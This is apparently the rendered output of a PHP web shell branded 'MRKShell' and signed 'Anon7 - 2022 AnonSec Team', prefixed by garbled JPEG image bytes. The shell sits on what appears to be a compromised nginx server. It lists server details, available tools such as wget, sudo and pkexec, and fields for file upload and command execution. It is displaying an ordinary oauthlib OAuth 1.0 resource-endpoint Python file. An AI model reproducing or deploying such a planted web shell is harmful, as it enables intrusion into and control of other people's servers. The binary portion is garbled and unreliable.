JFIF # -$)%7&).0444#9?92>-240 5+#+4;224;652252222225222220222522225222522;2225222222"B!1AQa"q2B#R3br5CS/!12AQ"aRq#3 ??;}q7:bd%Ո>L8/$rsrQٷf=+e: Rb0Z6pN۰7b 1S`JAT K,-֥7(bNRb9CsD/s,9?}+KA]`,EΞ@@ 3ukq14""tD@D@D@D@D@D@D@D@D@D@D@ȓ|:^Yw-)G%AI/9pwVSнm@6=g7AA5tg18gj>F'J,{C3(q<*#AzX?[$va:Q4SԽ7Uԥ&,c}nF;3mO$DN}RySm\*I"}b%7GLj;gp{{FYs(p_xOJFtStǸMU蓰s95"#H'Uq>7F5[}>v%'Y,&CqMzn}m*Xo vl˳hrӦ V)))g`7$sz^%I-1leE]y%݉>?f}( *BNNñ𜤢S[i'T1 ӥԊ>NlHď~)pKw1.UsD LI/k]Sr\r=ߴMAZNKi+P}| qBS*G*z:Imk\_|l6A7߉H\z0賈'Zt_\u>4 {\#O[ERxzLvP wOLT C0ȴ]BAʷ7uNNINS,(DDDDDDDL8MY݂N$ dMK׭i2FesmNQ=?omKv]OVl^@&pɴ[t5+E`oy.E]Ϳ}$g(7y7&X+imcT\(cHɤ|=. C =yȗXʧpv=&cX*[X_i4 GtfFՓnbMjR@ thv4LO I0zlU-_*G!cH9`nԿ \k-~rS*c[}9]qbi~+%)(h($ s;dՒG_\ё[Q,plq!pEſA RZU0*\n]a~Md_3EZ { &8e:jR*dAkyۛs\B˞0Z5%6e`3;0slSx+Xȇ"*ozkE"vܬWاQ8r @ m5$ [/KNFycgrۑ@ {""""""|xd*@s7o~7BSG|܎vøGtЍL١ѬnK/, f~^~l/Ij+!JI'^;{˚*hӤJarʮ)ڱ[P^$;%.V FLJW̔?2ԭUpJe,~b%iW Yhz̻FAl|3ln"M4kM@$2wmͣp8JY)ݬ.]3vԩİ(P*Tb/1FXTg KŮ*C9jE[69d!GZȩMu!5`H\Cp"=wSAmJjCn&/*Q[kQ~b"zΕ~)aA(2EZ0(FÑp.66_φk}T5 YdRarK ɽLSj"SnR-N-Mz~F^Igb Jq(~X fH'Ӵp5_HN(ܰ,Ȍ䶛DK%a~?FuI}"p=U+j}'p&I_ɑ-x!IٮM:w|q;9M?.6x:ODѪ̬zTL`t^?8xJ$ Q cL4d/_xy ˔ SPGNgwSrrS/`5ӧKj ,hTpI=LѦ(,Pc4*4iESO?5sMz<`&_bsTO)fkX[ xqq::h9ifVۉ\_R }JVg~Jzm`(]:O &6IOghX6+HM 7X]RkUr{HL-"< >~28b{[><@6gF5&\1̹nVŕonZM7 (SF$l\sM];owE+IֹȫzɲDߌPcMQMG)b,N ;*!uo&rHT`s^7įĴz0?P&Ҫ3]@H:hڢFҢM~p{&0s?k}+Ι9׵mw >?"fs+Odٯ̌m(R9T:UpbkW=F*ZQh urk8C8@ҧeUԀyKS '.UP,NBcpFS6n=AJl*7 4<(XY_Cda/D=()b,{yHL>[jrǹ7#M7fO`o/w]GȈEU2f\?7a)#봙݂͠SEg>VRdPfF@PV"Ꮷ_(qCJG_0?1[% NKu$7&ۭ ߡ26U$`/ 3ES:/nek |\tmSg5 س}6/qDT "(*sP4SrX)%T(6y%_ Z9<%]B}oyyY"]76*U*vjijw i3D̍IS \Jnn9ۋ>%o;~)5u56槡'z* B5#5

5#a`,>1TW{Xɘ}G4"ҕ4z5F>e6*[\;%*U0LUUr2cpnݢkɜY͌3+bG0#el۴oe,,jO*M1X/3z)W^,p>s{ İQs:ޝd|w :fIe$~+ajXjnT80'S>KIUP&kNϒT=XlȞNڞ]Yz_K[Qׂގ\gq!nB@IoG *l;_뼳\RUeэkm)qh傢5KNz٘6ba:671k{  $N vfN]S7gxg=VjG;wBx t~l/"ʭl=ԝ6n[Dٛ]@"x)# E):\8Bvkcpv4O*;coJ?4ªMCA'.\zVð'w1USݻSlTyj/ gʕ,:S')ܴ]7!A^b%P׶ٮհU3 o\}XTp,e 597n}dk6UFrVǧ3qaR:BWn>Ѻ}oxKӦK)kܑKL tCs1#?升 v{r:u)?#ZxM=ڝYـ#e}JHBGTG>GsܞG2+~R̅Hש)$[*Hfx-ugx({ I7λwvYm~ |e'X#db@hW,0H8*J5AъA`;jȊY*&sh8Jn]"M>l3z%Րsy=Um'qF sX %,Uv|0W`Gzcy*V0'3R`5ޓ Hڙ>PWbw7;)[U(:krm>/ QU+)P>Hm!r -evY>wT7ԝe)^6_SN⚓ϫ('?2Sj5,[پd|+_Pv'[]t'mΝ2l}z/dz^E|"'J qED)R2ƂSg`9Ոu5~ d!G%>M6%pdcP-P L`ϼTQnA_,24G GneRn,XnߕSzV$ReBfZuE ,Z(yi?vO!clOYA [; c I|vCom+Hꡤ\eaӴ;XS|v4%FcϷAQ[yϢ_s+Ơ&pt}=%^Sb"#gĀ'[ oAUPzr;ȔZTy4t>f種ً>T؟GRgC^-WЖukS,G LV$ܱO餰%cp)[*X_v$@DDӢ3bE-V0֍?zySyadd\ j5": Bxi?;3a]1]ZFD澙rc|8uz/ CȎ3UTqb4'ҥX 6KʖYT2fPe$6 lGzSQTP} OL1q^*rxջQ_K?'?=V MR K IS HERE

MRKShell
Server IP : 104.21.73.244  /  Your IP : 172.71.28.142
Web Server : nginx/1.14.1
System : Linux comtuc2-s-2vcpu-8gb-160gb-intel-nyc3 4.18.0-348.7.1.el8_5.x86_64 #1 SMP Wed Dec 22 13:25:12 UTC 2021 x86_64
User : nginx ( 991)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/lib/python3.6/site-packages/oauthlib/oauth1/rfc5849/endpoints/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /usr/lib/python3.6/site-packages/oauthlib/oauth1/rfc5849/endpoints/resource.py
# -*- coding: utf-8 -*-
"""
oauthlib.oauth1.rfc5849.endpoints.resource
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

This module is an implementation of the resource protection provider logic of
OAuth 1.0 RFC 5849.
"""
from __future__ import absolute_import, unicode_literals

import logging

from .. import errors
from .base import BaseEndpoint

log = logging.getLogger(__name__)


class ResourceEndpoint(BaseEndpoint):

    """An endpoint responsible for protecting resources.

    Typical use is to instantiate with a request validator and invoke the
    ``validate_protected_resource_request`` in a decorator around a view
    function. If the request is valid, invoke and return the response of the
    view. If invalid create and return an error response directly from the
    decorator.

    See :doc:`/oauth1/validator` for details on which validator methods to implement
    for this endpoint.

    An example decorator::

        from functools import wraps
        from your_validator import your_validator
        from oauthlib.oauth1 import ResourceEndpoint
        endpoint = ResourceEndpoint(your_validator)

        def require_oauth(realms=None):
            def decorator(f):
                @wraps(f)
                def wrapper(request, *args, **kwargs):
                    v, r = provider.validate_protected_resource_request(
                            request.url,
                            http_method=request.method,
                            body=request.data,
                            headers=request.headers,
                            realms=realms or [])
                    if v:
                        return f(*args, **kwargs)
                    else:
                        return abort(403)
    """

    def validate_protected_resource_request(self, uri, http_method='GET',
                                            body=None, headers=None, realms=None):
        """Create a request token response, with a new request token if valid.

        :param uri: The full URI of the token request.
        :param http_method: A valid HTTP verb, i.e. GET, POST, PUT, HEAD, etc.
        :param body: The request body as a string.
        :param headers: The request headers as a dict.
        :param realms: A list of realms the resource is protected under.
                       This will be supplied to the ``validate_realms``
                       method of the request validator.
        :returns: A tuple of 2 elements.
                  1. True if valid, False otherwise.
                  2. An oauthlib.common.Request object.
        """
        try:
            request = self._create_request(uri, http_method, body, headers)
        except errors.OAuth1Error:
            return False, None

        try:
            self._check_transport_security(request)
            self._check_mandatory_parameters(request)
        except errors.OAuth1Error:
            return False, request

        if not request.resource_owner_key:
            return False, request

        if not self.request_validator.check_access_token(
                request.resource_owner_key):
            return False, request

        if not self.request_validator.validate_timestamp_and_nonce(
                request.client_key, request.timestamp, request.nonce, request,
                access_token=request.resource_owner_key):
            return False, request

        # The server SHOULD return a 401 (Unauthorized) status code when
        # receiving a request with invalid client credentials.
        # Note: This is postponed in order to avoid timing attacks, instead
        # a dummy client is assigned and used to maintain near constant
        # time request verification.
        #
        # Note that early exit would enable client enumeration
        valid_client = self.request_validator.validate_client_key(
            request.client_key, request)
        if not valid_client:
            request.client_key = self.request_validator.dummy_client

        # The server SHOULD return a 401 (Unauthorized) status code when
        # receiving a request with invalid or expired token.
        # Note: This is postponed in order to avoid timing attacks, instead
        # a dummy token is assigned and used to maintain near constant
        # time request verification.
        #
        # Note that early exit would enable resource owner enumeration
        valid_resource_owner = self.request_validator.validate_access_token(
            request.client_key, request.resource_owner_key, request)
        if not valid_resource_owner:
            request.resource_owner_key = self.request_validator.dummy_access_token

        # Note that `realm`_ is only used in authorization headers and how
        # it should be interepreted is not included in the OAuth spec.
        # However they could be seen as a scope or realm to which the
        # client has access and as such every client should be checked
        # to ensure it is authorized access to that scope or realm.
        # .. _`realm`: https://tools.ietf.org/html/rfc2617#section-1.2
        #
        # Note that early exit would enable client realm access enumeration.
        #
        # The require_realm indicates this is the first step in the OAuth
        # workflow where a client requests access to a specific realm.
        # This first step (obtaining request token) need not require a realm
        # and can then be identified by checking the require_resource_owner
        # flag and abscence of realm.
        #
        # Clients obtaining an access token will not supply a realm and it will
        # not be checked. Instead the previously requested realm should be
        # transferred from the request token to the access token.
        #
        # Access to protected resources will always validate the realm but note
        # that the realm is now tied to the access token and not provided by
        # the client.
        valid_realm = self.request_validator.validate_realms(request.client_key,
                                                             request.resource_owner_key, request, uri=request.uri,
                                                             realms=realms)

        valid_signature = self._check_signature(request)

        # log the results to the validator_log
        # this lets us handle internal reporting and analysis
        request.validator_log['client'] = valid_client
        request.validator_log['resource_owner'] = valid_resource_owner
        request.validator_log['realm'] = valid_realm
        request.validator_log['signature'] = valid_signature

        # We delay checking validity until the very end, using dummy values for
        # calculations and fetching secrets/keys to ensure the flow of every
        # request remains almost identical regardless of whether valid values
        # have been supplied. This ensures near constant time execution and
        # prevents malicious users from guessing sensitive information
        v = all((valid_client, valid_resource_owner, valid_realm,
                 valid_signature))
        if not v:
            log.info("[Failure] request verification failed.")
            log.info("Valid client: %s", valid_client)
            log.info("Valid token: %s", valid_resource_owner)
            log.info("Valid realm: %s", valid_realm)
            log.info("Valid signature: %s", valid_signature)
        return v, request

Anon7 - 2022
AnonSec Team